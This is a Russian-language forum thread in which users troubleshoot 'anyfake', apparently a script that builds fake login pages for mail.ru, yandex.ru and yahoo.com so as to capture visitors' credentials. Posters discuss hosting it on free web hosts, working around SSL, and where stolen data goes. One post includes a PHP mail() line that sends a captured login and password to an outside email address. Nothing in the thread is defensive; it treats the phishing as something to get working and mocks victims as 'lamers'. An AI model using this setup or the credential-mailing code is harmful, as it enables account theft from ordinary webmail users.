![]() |
вопрос а какой скрипт нужен вместо loginhere.php.
|
Цитата:
Обычно login.php бывает ! |
вот мне интересно, чем нужно заполнить поля в энифэйк, чтобы все сработало (чтобы сгенерился рабочий anyfake.php)
|
zloy_admin, смотри версию 1.1, чего ты про ерёму то....
|
Цитата:
но че-то ума мне хватило... подскажи, плиз с мэйлом всё норм. а с яху них. не выходит. |
На yahoo.com https - SSL
С этим версия 1.1 не совместима.. В ближайшее время выйдет обновление... |
Ждем обновления.
А до выхода обновления расчет на полных ламаков :) |
Цитата:
|
Sandjuro, давай все сайты с SSL перечислим?
|
Цитата:
я домой :) |
какой принцип работы скриптига?
|
ну когда же обновление???
|
Скоро
|
Цитата:
Отправляемые данные сохраняет в файл либо отсылает на почту |
Жду обновления... А то все время "Unable to connect to yandex.ru" надоело уже)))
Жду... |
Времени пока нету
|
не понял настройку Fake Script на mail.ru какой его писать???
|
народя вот в этом молодой есче, а дайте пожалуйста сцылук на то чтобы я понял для чего етот скрипт и как он работает!
|
Если ты прочитал 7 страниц темы и не понял, для чего предназначен скрипт, тогда проходи мимо и не натруждай моск.
|
Цитата:
Вот этот путь прописывай |
интересно, вбил я все данные, нажал на кнопку Fake а дальче что???
|
Дальше если фтп соответствует всем требованиям , в файле aNYfAKE.php появится ложная страница авторизации
|
и что с етой ложной страницей авторизацией делать??? кстати перешел на нее а он мне пишет Unable to connect to mail.ru есть какие варианты обхода етого, или это озночает то что настройки программы неправильны!??? :confused:
|
Это означает что где обшибка или очепятка ;)
|
Интересно, а на 000webhost.com будет работать?
Скрипт с проверкой сокетов не ругалсо... |
Как на данный момент можно сделать fake для mail.ru ?
Возможно ли в принципе с помощью anyfake? (хост 110mb.com) |
Цитата:
|
Кто подскажет почему на этом сервере 000webhost.com не присылает ответ $
mail("lam@kar.net","Disk","4el $Login Pas: $Password " ); Присылает ответ: 4еl Pas A ответа переменных нет:( Ps. Пробывал на локальном сервере всё работает с ответом |
Друзья, помогите с настройкой - выложил все на хостинг свой, зашел на страницу, что именно надо вписать в поля
Fake path: и Fake script: А то что бы я ни вписывал, самое путное что получается - страница мэйла с ошибкой "Данная страница не найдена на нашем сервере. ".. Заранее благодарю.. |
Отличный скрипт, тока долго мучался с настройкой и даже сам не понял как всё-таки всё получилось :) Пасыба автору)
|
у меня проблема в одном, не загружается ксс :( и ещё вопрос, возможно ли сделать что бы сохранялся весь фейк куда нить :)
|
а как его запустить ?
anyfake.php открываю через браузер там какие то иероглифы )) и в конфиге что либо надо прописывать ? |
Цитата:
"Как настроить читаем на главной странице либо на скрине"... |
| Время: 18:11 |